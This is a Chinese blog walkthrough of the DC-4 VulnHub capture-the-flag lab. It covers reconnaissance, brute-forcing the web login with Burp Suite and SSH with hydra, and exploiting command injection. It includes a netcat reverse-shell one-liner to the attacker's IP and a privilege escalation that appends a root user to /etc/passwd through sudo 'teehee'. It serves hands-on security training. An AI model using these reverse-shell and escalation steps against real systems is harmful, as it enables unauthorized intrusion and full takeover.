【记一次DC4靶场夺旗过程】

目录

前言  

夺旗过程

总结


前言  

   最近也是学了一些提权方面的知识,所以找个靶场来练练手。以下针对vulnerable发布的dc4靶场来进行一个简单的渗透测试。将靶机下载好导入到VMware中。

   测试环境:dc4靶机:https://download.vulnhub.com/dc/DC-4.zip

夺旗过程

一、信息收集

  由于靶机没有给出IP地址,所以我们需要使用信息收集去获取有用的信息。工具:nmap. 

获取到了dc靶机的IP地址后,接着使用nmap获取到目标靶机的操作系统、开启的服务、端口、软件版本。

意外收获:发现了靶机开启了22 端口,ssh服务;80 端口,http服务;操作系统为Linux。

先尝试对web服务下手,看看这个靶机的 站的功能是什么。发现其主要是一个登录的界面:

二、获取dc 站用户登录信息

一般来说一个登录的界面给到你,可以尝试的攻击方式依次为:sql注入、暴力破解、xxe、越权、弱口令。使用sqlmap工具未检测出存在sql注入。xxe漏洞不存在,这个可以使用bp抓包,判断传输数据的格式不是xml。至于越权和弱口令,尝试后未判断出来存在漏洞。所以我们采用暴力破解这种最原始最暴力的方式来破解它的登录账 和密码。

工具:burpsuite +字典。

bp抓取用户登录该 站的数据包送至intruder模块,选择positions为:username 和password,攻击类型为cluster bomb。攻击的palyload为导入的字典。设置完成后点击开始攻击。

 成功爆破出靶场的 站的登录用户:admin ,密码:happy.

三、反弹shell

  成功登录到 站傻上面后,测试出 站存在命令执行的漏洞。

  所以,可以借此反弹shell.尝试使用bp抓包,获取到数据包后送至repeater中,先在kali中使用nc监听11111端口,然后在repeater模块中的数据包中写入反弹shell命令:nc 192.168.175.135  11111 -e /bin/bash,点击send。(关于原生版本的nc安装方法参考:原生版本的netcat安装方法)

四、查找信息

这好比你是一个小偷,你进入别人家的房子里面翻箱倒柜的查找有用的东西。现在我们已经拿到这个 站的shell了,但是,对整个的操作系统方面,我们还没有足够的权限去使唤管理员。所以,需要进行有用的信息查询。提供思路:目录(/home、/etc ……);这里我们查找/home目录下,

发现存在这三个用户:charles、jim、sam。再进入各自的家目录中搜寻有用的文件,发现/home/jim目录中存在着密码的备份文件old-passwords.bak,有密码备份文件和用户名(再/home中发现的),并且22 端口是开启的,那么我们可以尝试使用暴力破解远程登录。进而拿到一个root创建的用户,进而继续尝试后续提权操作。

kali工具hydra(九头蛇)暴力破解ssh登录。

创建字典:

 使用hydra成功爆破出一个可以登录ssh的用户信息,用户名:jim ,密码: jibril04。

使用kali远程连接:

五、提权

查询当前用户能否满足sudo提权、suid提权、crontable提权、linux内核漏洞提权等

1. sudo提权:失败:

2. 查询可利用的suid提权:

 搞了半天,原来被耍了,suid提权参考:https://gtfobins.github.io/

然并卵………….. 

3. 所以去看看/var/mail的记录:发现有邮箱记录:

 用户:charles,,密码:^xHhA&hvim0y,,从邮箱的内容发现,charles的权限貌似要高一些;

使用charles用户登录系统

 尝试使用sudo提权:

 发现了一个/usr/bin/teehee的命令,但是在相关sudo提权 站上面查询了之后发现没有对应的提权命令,盲猜这个命令是一个别名。所以:

 大致知晓其作用是:将标准输入复制到每个FILE,也复制到标准输出。

所以可以尝试添加一个root权限的用户,使用标准输出修改/etc/passwd中的该用户信息,使得其无密码即可登录:

 输入命令:

cat /etc/passwd:

 可以发现已经提权到root权限了。

总结

其实可以发现,我们从渗透整个 站来看,无非离不开的一个就是:信息收集。想想自己在渗透中的提权方面卡壳了很久,究其原因就是信息收集能力薄弱,所以还需加强这方面的练习

文章知识点与官方知识档案匹配,可进一步学习相关知识CS入门技能树Linux入门初识Linux25320 人正在系统学习中

声明:本站部分文章及图片源自用户投稿,如本站任何资料有侵权请您尽早请联系jinwei@zod.com.cn进行处理,非常感谢!

上一篇 2022年6月6日
下一篇 2022年6月6日

相关推荐